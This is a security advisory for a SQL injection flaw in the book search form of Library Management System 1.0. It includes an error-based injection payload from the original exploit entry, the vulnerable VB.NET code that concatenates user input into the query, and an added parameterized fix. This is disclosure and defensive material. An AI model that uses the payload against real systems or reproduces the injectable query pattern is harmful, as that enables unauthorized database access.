Vendor: Library Management System
By: Ihsan Sencan
CVSS: 9.8 (CRITICAL)
Type: SQL Injection
CWE: 89
Product Name: Library Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CVE: CVE-2018-18796
CPE: a:sourcecodester:library_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
Year: 2018

Library Management System 1.0 – ‘frmListBooks’ SQL Injection

Library Management System 1.0 is vulnerable to SQL injection. The vulnerability exists because the 'frmListBooks' module does not properly sanitize user-supplied input: the contents of the txtSearch text box are concatenated directly into the SQL query. An attacker can exploit this to execute arbitrary SQL commands in the application's backend database, allowing them to access or modify sensitive data, or even gain access to the underlying system.

Mitigation:

Input validation should be used to detect unauthorized input before it is processed by the application. All input data should be validated and filtered, as appropriate, before being used in SQL queries.

Exploit-DB raw data:

# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18796

# POC: 
# 1)
# textSearch System.Windows.Forms.TextBox / [SQL]
# 
# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
# 
# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
# 
#[PATH]/forms/frmListofBooks.vb
#...

Public Class frmListBooks

     Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
         ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` "
         reloadDtg(sql, dtgList)
     End Sub
 
     Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
          ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId`  AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')"
         reloadDtg(sql, dtgList)
     End Sub
 
     Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
         Try
             If dtgList.CurrentRow.Cells(10).Value = "Available" Then
                 frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value
                 Me.Close()
             Else
                 MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
 
             End If
         Catch ex As Exception
 
         End Try
 
     End Sub
 
     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         Me.Close()
     End Sub
 End Class
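
A hardened form of the search handler above, given as an added example that is not part of the original advisory or the vendor's code. It binds the search text as a query parameter instead of concatenating it, and escapes LIKE wildcards so the text matches literally. It assumes MySQL Connector/NET (MySql.Data.MySqlClient); the module name, function names and connection string are hypothetical placeholders.

```vbnet
Imports System.Data
Imports MySql.Data.MySqlClient

' Hypothetical helper module (assumption): not part of the vendor's project.
Public Module BookSearch

    ' Placeholder connection string (assumption); the project's real settings are not shown on the page.
    Private Const ConnStr As String = _
        "server=localhost;database=PLACEHOLDER_DB;uid=PLACEHOLDER_USER;pwd=PLACEHOLDER_PASSWORD"

    ' Escape LIKE metacharacters so the user's text is matched literally.
    ' Backslash is MySQL's default LIKE escape character, so it is escaped first.
    Public Function EscapeLike(ByVal term As String) As String
        Return term.Replace("\", "\\").Replace("%", "\%").Replace("_", "\_")
    End Function

    ' Same query as txtSerach_TextChanged, but the search term travels as a
    ' bound parameter and never becomes part of the SQL text.
    Public Function SearchBooks(ByVal term As String) As DataTable
        Const sql As String = _
            "SELECT `AccessionNo`, `BookTitle`, `BookDesc` AS 'Description', `Author`, " & _
            "`PublishDate`, `BookPublisher`, `Category`, BookType AS 'typeOfBooks', " & _
            "`BookPrice` AS 'Price', DeweyDecimal, Status " & _
            "FROM `tblbooks` b, `tblcategory` c " & _
            "WHERE b.`CategoryId` = c.`CategoryId` " & _
            "AND (`BookTitle` LIKE @pattern OR `Author` LIKE @pattern " & _
            "OR `AccessionNo` LIKE @pattern)"

        Dim result As New DataTable()
        Using conn As New MySqlConnection(ConnStr)
            Using cmd As New MySqlCommand(sql, conn)
                ' The wildcards are added around the escaped value, not inside the SQL string.
                cmd.Parameters.Add("@pattern", MySqlDbType.VarChar).Value = _
                    "%" & EscapeLike(term) & "%"
                Using adapter As New MySqlDataAdapter(cmd)
                    adapter.Fill(result) ' Fill opens and closes the connection itself
                End Using
            End Using
        End Using
        Return result
    End Function

End Module

' In the form, assuming dtgList is a DataGridView:
'     dtgList.DataSource = BookSearch.SearchBooks(txtSearch.Text)
```

With the parameter bound, text typed into txtSearch is only ever compared as data against the three columns, so quote characters and SQL keywords in it have no effect on the statement that runs.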